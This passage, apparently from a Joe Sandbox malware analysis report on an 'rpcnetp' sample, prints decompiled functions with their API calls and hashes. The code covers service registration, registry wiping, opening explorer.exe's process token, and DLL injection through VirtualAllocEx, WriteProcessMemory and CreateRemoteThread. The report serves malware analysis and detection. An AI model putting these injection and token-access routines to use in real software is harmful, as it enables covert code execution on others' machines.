					if(_t11 != 0) {
						WaitForSingleObject( *0xa160a4, 0xffffffff);
						_t13 =  *0xa1600c;
						if(_t13 != 0) {
							PostMessageA(_t13, 0x11, 0, 0);
						}
						WaitForSingleObject(_v8, 0x7530);
						CloseHandle(_v8);
					} else {
						 *0xa16020 = _t24;
					}
					CloseHandle( *0xa160a4);
					_t6 = E00A12266(1, 0, 0);
				}
				return _t6;
			}

0x00a12678
0x00a1267d
0x00a12687
0x00a12691
0x00a12697
0x00a1269d
0x00a126a4
0x00a126ab
0x00a126ac
0x00a126b3
0x00a126b4
0x00a126b5
0x00a126bb
0x00a126c4
0x00a126ce
0x00a126d3
0x00a126e5
0x00a126eb
0x00a126f1
0x00a126f7
0x00a126fc
0x00a12714
0x00a12716
0x00a1271d
0x00a12724
0x00a12724
0x00a12732
0x00a12737
0x00a126fe
0x00a126fe
0x00a126fe
0x00a12743
0x00a1274c
0x00a12751
0x00a12755

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00A12668
RegisterServiceCtrlHandlerA.ADVAPI32(rpcnet,00A11EEB), ref: 00A12697

Part of subcall function 00A12266: SetServiceStatus.ADVAPI32(00A16010,?,00A126C0,00000002,00001388,00000000), ref: 00A1228C

Part of subcall function 00A12296: RegOpenKeyA.ADVAPI32(80000002,System\CurrentControlSet\Services\rpcnetp,?), ref: 00A122B1
Part of subcall function 00A12296: RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00A160C8,00000080,00000002,00000000,00000001), ref: 00A122CF
Part of subcall function 00A12296: RegEnumValueA.ADVAPI32 ref: 00A12300
Part of subcall function 00A12296: RegCloseKey.ADVAPI32(?), ref: 00A12309

CreateThread.KERNELBASE(00000000,00000000,00A13161,00000000,00000000,?), ref: 00A126F1
WaitForSingleObject.KERNEL32(000000FF), ref: 00A12714
PostMessageA.USER32 ref: 00A12724
WaitForSingleObject.KERNEL32(?,00007530), ref: 00A12732
CloseHandle.KERNEL32(?), ref: 00A12737
CloseHandle.KERNEL32 ref: 00A12743

Strings

rpcnet, xrefs: 00A12673

Memory Dump Source

Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd

Similarity

API ID: Close$CreateHandleObjectServiceSingleValueWait$CtrlEnumEventHandlerMessageOpenPostQueryRegisterStatusThread
String ID: rpcnet
API String ID: 2965456292-717388198
Opcode ID: 03f62e30dcc2cda566649fea241f45f84f8f22b689ced2ebd73a5e6cdc2bc40f
Instruction ID: 92a43053453e3f98477f2486ba6a0ce95f252086c30b0c77c5fd196aea37f793
Opcode Fuzzy Hash: 03f62e30dcc2cda566649fea241f45f84f8f22b689ced2ebd73a5e6cdc2bc40f
Instruction Fuzzy Hash: E6214175902264BFC720EFE6AC49EDB7E6CFF09791B10C519F205D51A0C7B48682DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A13161, Relevance: 10.6, APIs: 7, Instructions: 62
windowregistrytimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E00A13161(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t11;
				struct HWND__* _t14;
				CHAR* _t30;
				void* _t35;

				_push(0x128);
				_push(0xa15430);
				E00A14A94(__ebx, __edi, __esi);
				 *(_t35 - 4) = 0;
				_t11 =  *0xa160c4;
				 *0x00A16070 = _t11;
				_t30 = _t35 - 0x138;
				 *0x00A16084 = _t30;
				GetModuleFileNameA(_t11, _t30, 0x103); // executed
				RegisterClassA(0xa16060); // executed
				_t14 = CreateWindowExA(0, _t30, 0, 0x80000, 0, 0, 0, 0, 0, 0, _t11, 0); // executed
				 *0xa1600c = _t14;
				asm("sbb eax, eax");
				SetTimer( *0xa1600c, 0x64, ( ~( *0xa16038) & 0xffff1d70) + 0xea60, 0); // executed
				while(GetMessageA(_t35 - 0x34, 0, 0, 0) != 0) {
					TranslateMessage(_t35 - 0x34);
					DispatchMessageA(_t35 - 0x34); // executed
				}
				 *0xa1600c = 0;
				 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
				return E00A1159C(0);
			}

0x00a13161
0x00a13166
0x00a1316b
0x00a13172
0x00a1317d
0x00a13182
0x00a13192
0x00a13198
0x00a131a5
0x00a131ab
0x00a131b1
0x00a131b7
0x00a131c4
0x00a131d9
0x00a131df
0x00a131f4
0x00a131fe
0x00a131fe
0x00a13206
0x00a13215
0x00a13220

APIs

GetModuleFileNameA.KERNEL32(?,?,00000103,00A16060,00000000,?,00000000,00080000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00A131A5
RegisterClassA.USER32 ref: 00A131AB
CreateWindowExA.USER32 ref: 00A131B1
SetTimer.USER32(00000064,?,00000000), ref: 00A131D9
GetMessageA.USER32 ref: 00A131E6
TranslateMessage.USER32(?), ref: 00A131F4
DispatchMessageA.USER32 ref: 00A131FE

Memory Dump Source

Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd

Similarity

API ID: Message$ClassCreateDispatchFileModuleNameRegisterTimerTranslateWindow
String ID:
API String ID: 2359640614-0
Opcode ID: 4fe2786f5314d3c2338f25eb3034e1d77bd71f948d143fbd939a69328f7c6ae2
Instruction ID: f0d20772072e72a8d143b65bed25b2e852bdf8aa4a98dfbb187828f7c5d83dc6
Opcode Fuzzy Hash: 4fe2786f5314d3c2338f25eb3034e1d77bd71f948d143fbd939a69328f7c6ae2
Instruction Fuzzy Hash: 2C113DB5940204BFD710DFB5DD49DEABBBDFB99741B10C629B602D21A0D6748A458B20

Uniqueness

Uniqueness Score: -1.00%

Function 00A12296, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 52
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A12296() {
				int _v8;
				void* _v12;
				char _v44;
				long _t13;
				int _t23;

				_v8 = 0x80;
				_t13 = RegOpenKeyA(0x80000002, "System\\CurrentControlSet\\Services\\rpcnetp",  &_v12); // executed
				if(_t13 == 0) {
					RegQueryValueExA(_v12, 0, 0, 0, 0xa160c8,  &_v8);
					_t23 = 0x20;
					while(1) {
						_v8 = _t23;
						if(RegEnumValueA(_v12, 0,  &_v44,  &_v8, 0, 0, 0, 0) != 0) {
							break;
						}
						RegDeleteValueA(_v12,  &_v44);
					}
					return RegCloseKey(_v12);
				}
				return _t13;
			}

0x00a122aa
0x00a122b1
0x00a122b9
0x00a122cf
0x00a122dd
0x00a122ed
0x00a122fd
0x00a12304
0x00000000
0x00000000
0x00a122e7
0x00a122e7
0x00000000
0x00a12311
0x00a12313

APIs

RegOpenKeyA.ADVAPI32(80000002,System\CurrentControlSet\Services\rpcnetp,?), ref: 00A122B1
RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00A160C8,00000080,00000002,00000000,00000001), ref: 00A122CF
RegDeleteValueA.ADVAPI32(?,?), ref: 00A122E7
RegEnumValueA.ADVAPI32 ref: 00A12300
RegCloseKey.ADVAPI32(?), ref: 00A12309

Strings

System\CurrentControlSet\Services\rpcnetp, xrefs: 00A122A0

Memory Dump Source

Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd

Similarity

API ID: Value$CloseDeleteEnumOpenQuery
String ID: System\CurrentControlSet\Services\rpcnetp
API String ID: 1768883651-3077676073
Opcode ID: 3b89d886fdf6e6dc95bc26592623a7d622ee9a4ce3291173ffdd8d7b5f4b6d23
Instruction ID: cb40558d475af733679fd2657673d1c12212c91af12c3506530cf0eb41d4cfd3
Opcode Fuzzy Hash: 3b89d886fdf6e6dc95bc26592623a7d622ee9a4ce3291173ffdd8d7b5f4b6d23
Instruction Fuzzy Hash: D601E576901118BADB209BD1DD48EDFBF7CEF092A0F104061FA05A2010D6309A96EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A124BC, Relevance: 7.6, APIs: 5, Instructions: 54
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E00A124BC(void* __ecx, void* _a4, _Unknown_base(*)()* _a8, void* _a12, intOrPtr _a16, DWORD* _a20, intOrPtr _a24) {
				intOrPtr _v8;
				int _v12;
				void* _t14;
				int _t15;
				DWORD* _t20;
				intOrPtr _t24;

				_t20 = _a20;
				_t24 = _a16;
				_v12 = 0;
				_v8 = _t24;
				 *_t20 = 0; // executed
				_t14 = CreateRemoteThread(_a4, 0, 0, _a8, _a12, 0, 0); // executed
				_v12 = _t14;
				if(_t14 == 0) {
					_t15 = TerminateProcess(_a4, 0);
				} else {
					if(_a24 != 0) {
						_push(0xffffffff);
						_push(0);
						_push( &_v12);
						if(_t24 == 0) {
							_push(1);
						} else {
							_push(2);
						}
						if(WaitForMultipleObjects() == 0) {
							GetExitCodeThread(_v12, _t20);
						}
					} else {
						 *_t20 = 1;
					}
					_t15 = CloseHandle(_v12);
				}
				return _t15;
			}

0x00a124c2
0x00a124c7
0x00a124d1
0x00a124d7
0x00a124df
0x00a124e1
0x00a124e7
0x00a124ec
0x00a1252f
0x00a124ee
0x00a124f1
0x00a124fb
0x00a12500
0x00a12501
0x00a12504
0x00a1250a
0x00a12506
0x00a12506
0x00a12506
0x00a12514
0x00a1251a
0x00a1251a
0x00a124f3
0x00a124f3
0x00a124f3
0x00a12523
0x00a12523
0x00a12539

APIs

CreateRemoteThread.KERNELBASE(?,00000000,00000000,?,?,00000000,00000000), ref: 00A124E1
WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 00A1250C
GetExitCodeThread.KERNEL32(?,?), ref: 00A1251A
CloseHandle.KERNEL32(?), ref: 00A12523
TerminateProcess.KERNEL32(?,00000000), ref: 00A1252F

Memory Dump Source

Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd

Similarity

API ID: Thread$CloseCodeCreateExitHandleMultipleObjectsProcessRemoteTerminateWait
String ID:
API String ID: 1317926807-0
Opcode ID: 078464f8f8a900559fe985d9e8852544c7dfc15ebc7327f30387866cb995fcc9
Instruction ID: a15e153925d0881e0cf38ab8bfa4885006603b907bf27c4a446f7c289a76373f
Opcode Fuzzy Hash: 078464f8f8a900559fe985d9e8852544c7dfc15ebc7327f30387866cb995fcc9
Instruction Fuzzy Hash: 4F113975801128FFCB229F82DC88ECF7F7AEF097A1F104101F60596150D3309AA1DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A13420, Relevance: 3.0, APIs: 2, Instructions: 40
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A13420(intOrPtr _a4) {
				char _v264;
				struct HINSTANCE__* _t21;
				void* _t23;
				struct HINSTANCE__* _t25;
				intOrPtr _t26;

				_t23 = 1;
				_t25 =  *0xa160c4;
				if(_a4 == 0) {
					E00A12842( &_v264, 0); // executed
					_t21 = LoadLibraryA( &_v264); // executed
					if(_t21 != 0) {
						_t25 = _t21;
					}
				}
				_t4 = _t25 -  *0xa160c4 + 0xa17204; // 0x1140
				_t26 = _t4;
				 *0xa16008 = _t26;
				 *0xa160b4 = _t25 -  *0xa160c4 + 0xa17000;
				if( *((intOrPtr*)(_t26 + 0x24)) == 0) {
					 *((intOrPtr*)(_t26 + 0x24)) = GetCurrentProcessId();
					_t23 = 0;
				}
				 *(_t26 + 0x2c +  *(_t26 + 0x28) * 4) =  *0xa160c4;
				 *0xa16000 = _t26;
				return _t23;
			}

0x00a1342c
0x00a13432
0x00a13438
0x00a13443
0x00a1344f
0x00a13457
0x00a13459
0x00a13459
0x00a13457
0x00a13463
0x00a13463
0x00a1346f
0x00a13475
0x00a1347e
0x00a13486
0x00a13489
0x00a13489
0x00a13494
0x00a13498
0x00a134a3

APIs

GetCurrentProcessId.KERNEL32(?,00000000), ref: 00A13480

Part of subcall function 00A12842: GetModuleFileNameA.KERNEL32(?,00000104), ref: 00A1285D
Part of subcall function 00A12842: lstrcpyA.KERNEL32(?,?), ref: 00A12893
Part of subcall function 00A12842: lstrlenA.KERNEL32(?), ref: 00A12896
Part of subcall function 00A12842: lstrcmpiA.KERNEL32(-00000003,00A112DC), ref: 00A128A4
Part of subcall function 00A12842: lstrcpyA.KERNEL32(-00000003,00A112DC), ref: 00A128B6
Part of subcall function 00A12842: CopyFileA.KERNEL32 ref: 00A128C3
Part of subcall function 00A12842: CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 00A128DA
Part of subcall function 00A12842: SetFilePointer.KERNELBASE(00000000,?,00000000,00000000), ref: 00A1291F
Part of subcall function 00A12842: WriteFile.KERNELBASE(00000000,00000000,00000002,?,00000000), ref: 00A12931
Part of subcall function 00A12842: CloseHandle.KERNEL32(00000000), ref: 00A12938

LoadLibraryA.KERNELBASE(?,?,00000000), ref: 00A1344F

Memory Dump Source

Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd

Similarity

API ID: File$lstrcpy$CloseCopyCreateCurrentHandleLibraryLoadModuleNamePointerProcessWritelstrcmpilstrlen
String ID:
API String ID: 2826298108-0
Opcode ID: ef5255370b548b0b57f14f32fd64dd85854cda71516374d9e7d00c6159a8c283
Instruction ID: b730dae998864ed558d88f2e9eca0f9613f8fa73e319efb8bf1147ecd3489de8
Opcode Fuzzy Hash: ef5255370b548b0b57f14f32fd64dd85854cda71516374d9e7d00c6159a8c283
Instruction Fuzzy Hash: 880121799012148FDB10DFB4DE847D577E8B70C355F02C5A9E64AD3254D370A986CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00A12266, Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A12266(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				int _t7;

				 *0xa16014 = _a4;
				 *0xa16024 = _a12;
				 *0xa16028 = _a8; // executed
				_t7 = SetServiceStatus( *0xa160bc, 0xa16010); // executed
				return _t7;
			}

0x00a1226c
0x00a1227f
0x00a12287
0x00a1228c
0x00a12293

APIs

SetServiceStatus.ADVAPI32(00A16010,?,00A126C0,00000002,00001388,00000000), ref: 00A1228C

Memory Dump Source

Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd

Similarity

API ID: ServiceStatus
String ID:
API String ID: 3969395364-0
Opcode ID: 6a1881f6f530f1c0d9da72d475f272331fe7c9d000439d551459df35f8cdf818
Instruction ID: 6886a58150bebcee19f4a7e57ddd0b6df9968df05e75662aabde50dab6faa405
Opcode Fuzzy Hash: 6a1881f6f530f1c0d9da72d475f272331fe7c9d000439d551459df35f8cdf818
Instruction Fuzzy Hash: F8D06775901308DF8710CF98E9449C57BE8FB0C710701C41AF908C3320D671E656DB55

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 72B22123, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 94
libraryloadermemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E72B22123(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t34;
				void* _t35;
				intOrPtr _t37;
				struct HINSTANCE__* _t45;
				void* _t46;
				void* _t49;
				long _t51;
				void* _t56;
				void* _t57;
				void* _t58;

				_t49 = __edx;
				_push(0x20);
				_push(0x72b253b8);
				E72B24A94(__ebx, __edi, __esi);
				 *(_t58 - 0x1c) =  *(_t58 - 0x1c) & 0x00000000;
				_t51 = 0x10000;
				 *(_t58 - 0x24) =  *(_t58 - 0x24) & 0x00000000;
				_t45 = LoadLibraryA("ntdll.dll");
				 *(_t58 - 0x20) = _t45;
				if(_t45 == 0) {
					L17:
					if( *(_t58 - 0x20) != 0) {
						FreeLibrary( *(_t58 - 0x20));
					}
					if( *(_t58 - 0x1c) != 0) {
						LocalFree( *(_t58 - 0x1c));
					}
					return E72B2159C( *(_t58 - 0x24), _t49);
				}
				_t33 = GetProcAddress(_t45, "NtQuerySystemInformation");
				 *(_t58 - 0x28) = _t33;
				if(_t33 == 0) {
					goto L17;
				}
				_t34 = GetProcAddress(_t45, "_wcsicmp");
				 *(_t58 - 0x2c) = _t34;
				if(_t34 == 0) {
					goto L17;
				}
				while(1) {
					_t35 = LocalAlloc(0x40, _t51);
					 *(_t58 - 0x1c) = _t35;
					if(_t35 == 0) {
						goto L17;
					}
					_t46 =  *(_t58 - 0x28)(5, _t35, _t51, 0);
					if(_t46 != 0xc0000004) {
						if(_t46 < 0) {
							goto L17;
						}
						L8:
						if(_t46 == 0xc0000004) {
							continue;
						}
						_t56 =  *(_t58 - 0x1c);
						 *(_t58 - 4) = 0;
						while(1) {
							_t37 =  *((intOrPtr*)(_t56 + 0x3c));
							if(_t37 == 0) {
								goto L14;
							}
							_push(L"explorer.exe");
							_push(_t37);
							if( *(_t58 - 0x2c)() != 0) {
								goto L14;
							}
							_t57 = OpenProcess(0x410, 0,  *(_t56 + 0x44));
							if(_t57 != 0) {
								OpenProcessToken(_t57, 0x200ff, _t58 - 0x24);
								CloseHandle(_t57);
							}
							L16:
							 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
							goto L17;
							L14:
							if( *_t56 == 0) {
								goto L16;
							}
							_t56 = _t56 +  *_t56;
							 *(_t58 - 0x30) = _t56;
						}
					}
					LocalFree( *(_t58 - 0x1c));
					 *(_t58 - 0x1c) =  *(_t58 - 0x1c) & 0x00000000;
					_t51 = _t51 + _t51;
					goto L8;
				}
				goto L17;
			}

0x72b22123
0x72b22123
0x72b22125
0x72b2212a
0x72b2212f
0x72b22133
0x72b22138
0x72b22147
0x72b22149
0x72b2214e
0x72b22223
0x72b22227
0x72b2222c
0x72b2222c
0x72b22236
0x72b2223b
0x72b2223b
0x72b22249
0x72b22249
0x72b22160
0x72b22162
0x72b22167
0x00000000
0x00000000
0x72b22173
0x72b22175
0x72b2217a
0x00000000
0x00000000
0x72b22185
0x72b22188
0x72b2218e
0x72b22193
0x00000000
0x00000000
0x72b221a2
0x72b221a6
0x72b221bb
0x00000000
0x00000000
0x72b221bd
0x72b221bf
0x00000000
0x00000000
0x72b221c1
0x72b221c6
0x72b221c9
0x72b221c9
0x72b221ce
0x00000000
0x00000000
0x72b221d0
0x72b221d5
0x72b221dd
0x00000000
0x00000000
0x72b221ee
0x72b221f2
0x72b221fe
0x72b22205
0x72b22205
0x72b2221f
0x72b2221f
0x00000000
0x72b2220d
0x72b2220f
0x00000000
0x00000000
0x72b22211
0x72b22213
0x72b22213
0x72b221c9
0x72b221ab
0x72b221b1
0x72b221b5
0x00000000
0x72b221b5
0x00000000

APIs

LoadLibraryA.KERNEL32(ntdll.dll,72B253B8), ref: 72B22141
GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 72B22160
GetProcAddress.KERNEL32(00000000,_wcsicmp), ref: 72B22173
LocalAlloc.KERNEL32(00000040,00010000), ref: 72B22188
LocalFree.KERNEL32(00000000), ref: 72B221AB
OpenProcess.KERNEL32(00000410,00000000,?), ref: 72B221E8
OpenProcessToken.ADVAPI32(00000000,000200FF,?), ref: 72B221FE
CloseHandle.KERNEL32(00000000), ref: 72B22205
FreeLibrary.KERNEL32(00000000), ref: 72B2222C
LocalFree.KERNEL32(00000000), ref: 72B2223B

Strings

explorer.exe, xrefs: 72B221D0
NtQuerySystemInformation, xrefs: 72B22154
ntdll.dll, xrefs: 72B2213C
_wcsicmp, xrefs: 72B2216D

Memory Dump Source

Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd

Similarity

API ID: FreeLocal$AddressLibraryOpenProcProcess$AllocCloseHandleLoadToken
String ID: NtQuerySystemInformation$_wcsicmp$explorer.exe$ntdll.dll
API String ID: 3808024924-2858649656
Opcode ID: 7abd6da23679d2fa9a4c0e9d733775fbe992e5d219684f4782b4c9058f1b78f4
Instruction ID: 2cd11ee1f3bcf27d2bb61f551ead356f26b6ede089a07f4ab670a0598fbe968c
Opcode Fuzzy Hash: 7abd6da23679d2fa9a4c0e9d733775fbe992e5d219684f4782b4c9058f1b78f4
Instruction Fuzzy Hash: C831C332D503169FDB128FA9CD48B9EB6F4EF88317F210529E65AF6146DB764840CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00A12123, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 94
libraryloadermemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00A12123(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t34;
				void* _t35;
				intOrPtr _t37;
				struct HINSTANCE__* _t45;
				void* _t46;
				long _t50;
				void* _t55;
				void* _t56;
				void* _t57;

				_push(0x20);
				_push(0xa153b8);
				E00A14A94(__ebx, __edi, __esi);
				 *(_t57 - 0x1c) =  *(_t57 - 0x1c) & 0x00000000;
				_t50 = 0x10000;
				 *(_t57 - 0x24) =  *(_t57 - 0x24) & 0x00000000;
				_t45 = LoadLibraryA("ntdll.dll");
				 *(_t57 - 0x20) = _t45;
				if(_t45 == 0) {
					L17:
					if( *(_t57 - 0x20) != 0) {
						FreeLibrary( *(_t57 - 0x20));
					}
					if( *(_t57 - 0x1c) != 0) {
						LocalFree( *(_t57 - 0x1c));
					}
					return E00A1159C( *(_t57 - 0x24));
				}
				_t33 = GetProcAddress(_t45, "NtQuerySystemInformation");
				 *(_t57 - 0x28) = _t33;
				if(_t33 == 0) {
					goto L17;
				}
				_t34 = GetProcAddress(_t45, "_wcsicmp");
				 *(_t57 - 0x2c) = _t34;
				if(_t34 == 0) {
					goto L17;
				}
				while(1) {
					_t35 = LocalAlloc(0x40, _t50);
					 *(_t57 - 0x1c) = _t35;
					if(_t35 == 0) {
						goto L17;
					}
					_t46 =  *(_t57 - 0x28)(5, _t35, _t50, 0);
					if(_t46 != 0xc0000004) {
						if(_t46 < 0) {
							goto L17;
						}
						L8:
						if(_t46 == 0xc0000004) {
							continue;
						}
						_t55 =  *(_t57 - 0x1c);
						 *(_t57 - 4) = 0;
						while(1) {
							_t37 =  *((intOrPtr*)(_t55 + 0x3c));
							if(_t37 == 0) {
								goto L14;
							}
							_push(L"explorer.exe");
							_push(_t37);
							if( *(_t57 - 0x2c)() != 0) {
								goto L14;
							}
							_t56 = OpenProcess(0x410, 0,  *(_t55 + 0x44));
							if(_t56 != 0) {
								OpenProcessToken(_t56, 0x200ff, _t57 - 0x24);
								CloseHandle(_t56);
							}
							L16:
							 *(_t57 - 4) =  *(_t57 - 4) | 0xffffffff;
							goto L17;
							L14:
							if( *_t55 == 0) {
								goto L16;
							}
							_t55 = _t55 +  *_t55;
							 *(_t57 - 0x30) = _t55;
						}
					}
					LocalFree( *(_t57 - 0x1c));
					 *(_t57 - 0x1c) =  *(_t57 - 0x1c) & 0x00000000;
					_t50 = _t50 + _t50;
					goto L8;
				}
				goto L17;
			}

0x00a12123
0x00a12125
0x00a1212a
0x00a1212f
0x00a12133
0x00a12138
0x00a12147
0x00a12149
0x00a1214e
0x00a12223
0x00a12227
0x00a1222c
0x00a1222c
0x00a12236
0x00a1223b
0x00a1223b
0x00a12249
0x00a12249
0x00a12160
0x00a12162
0x00a12167
0x00000000
0x00000000
0x00a12173
0x00a12175
0x00a1217a
0x00000000
0x00000000
0x00a12185
0x00a12188
0x00a1218e
0x00a12193
0x00000000
0x00000000
0x00a121a2
0x00a121a6
0x00a121bb
0x00000000
0x00000000
0x00a121bd
0x00a121bf
0x00000000
0x00000000
0x00a121c1
0x00a121c6
0x00a121c9
0x00a121c9
0x00a121ce
0x00000000
0x00000000
0x00a121d0
0x00a121d5
0x00a121dd
0x00000000
0x00000000
0x00a121ee
0x00a121f2
0x00a121fe
0x00a12205
0x00a12205
0x00a1221f
0x00a1221f
0x00000000
0x00a1220d
0x00a1220f
0x00000000
0x00000000
0x00a12211
0x00a12213
0x00a12213
0x00a121c9
0x00a121ab
0x00a121b1
0x00a121b5
0x00000000
0x00a121b5
0x00000000

APIs

LoadLibraryA.KERNEL32(ntdll.dll,00A153B8), ref: 00A12141
GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00A12160
GetProcAddress.KERNEL32(00000000,_wcsicmp), ref: 00A12173
LocalAlloc.KERNEL32(00000040,00010000), ref: 00A12188
LocalFree.KERNEL32(00000000), ref: 00A121AB
OpenProcess.KERNEL32(00000410,00000000,?), ref: 00A121E8
OpenProcessToken.ADVAPI32(00000000,000200FF,?), ref: 00A121FE
CloseHandle.KERNEL32(00000000), ref: 00A12205
FreeLibrary.KERNEL32(00000000), ref: 00A1222C
LocalFree.KERNEL32(00000000), ref: 00A1223B

Strings

_wcsicmp, xrefs: 00A1216D
ntdll.dll, xrefs: 00A1213C
explorer.exe, xrefs: 00A121D0
NtQuerySystemInformation, xrefs: 00A12154

Memory Dump Source

Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd

Similarity

API ID: FreeLocal$AddressLibraryOpenProcProcess$AllocCloseHandleLoadToken
String ID: NtQuerySystemInformation$_wcsicmp$explorer.exe$ntdll.dll
API String ID: 3808024924-2858649656
Opcode ID: 03db7c7b0cd1b0b1d719edaacbd2244d4539c06534855437c1ed6a73ac2d8651
Instruction ID: f35949a8f8dae5feebadd61eda2e6d63a78fbfc81483376e5cef68194900142f
Opcode Fuzzy Hash: 03db7c7b0cd1b0b1d719edaacbd2244d4539c06534855437c1ed6a73ac2d8651
Instruction Fuzzy Hash: CE31AB35E40316AFDB218BA4EC48BEEBAB8FF5C711F244125E611B2190DBB58DD1CB64

Uniqueness

Uniqueness Score: -1.00%

Function 72B227D2, Relevance: 6.0, APIs: 4, Instructions: 48
memorystringinjectionCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E72B227D2(void* __ecx, void* _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				void* _t18;
				void* _t22;

				_t20 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t18 = _a8;
				_t22 = VirtualAllocEx(_t18, 0, 0x1000, 0x1000, 4);
				if(_t22 != 0) {
					if(WriteProcessMemory(_t18, _t22, _a4, lstrlenA(_a4) + 1, 0) != 0) {
						E72B224BC(_t20, _t18, __imp__LoadLibraryA, _t22, _a12,  &_v8, 1);
					}
					VirtualFreeEx(_t18, _t22, 0x1000, 0x8000);
				}
				return _v8;
			}

0x72b227d2
0x72b227d5
0x72b227d6
0x72b227db
0x72b227f2
0x72b227f6
0x72b22812
0x72b22825
0x72b22825
0x72b22832
0x72b22832
0x72b2283f

APIs

VirtualAllocEx.KERNEL32(?,00000000,00001000,00001000,00000004,00000044,00000000,00000001,?,?,72B22C40,?,?,00000000,?,00000000), ref: 72B227EC
